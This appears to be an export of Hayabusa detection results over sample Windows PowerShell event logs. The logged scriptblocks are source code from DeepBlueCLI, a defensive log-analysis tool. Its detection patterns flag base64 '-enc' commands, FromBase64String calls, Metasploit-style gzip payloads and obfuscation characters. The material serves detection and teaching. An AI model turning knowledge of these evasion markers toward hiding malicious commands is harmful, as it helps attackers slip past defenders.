$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not 
reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.562 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.567 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.570 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.476 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.476 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.477 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace 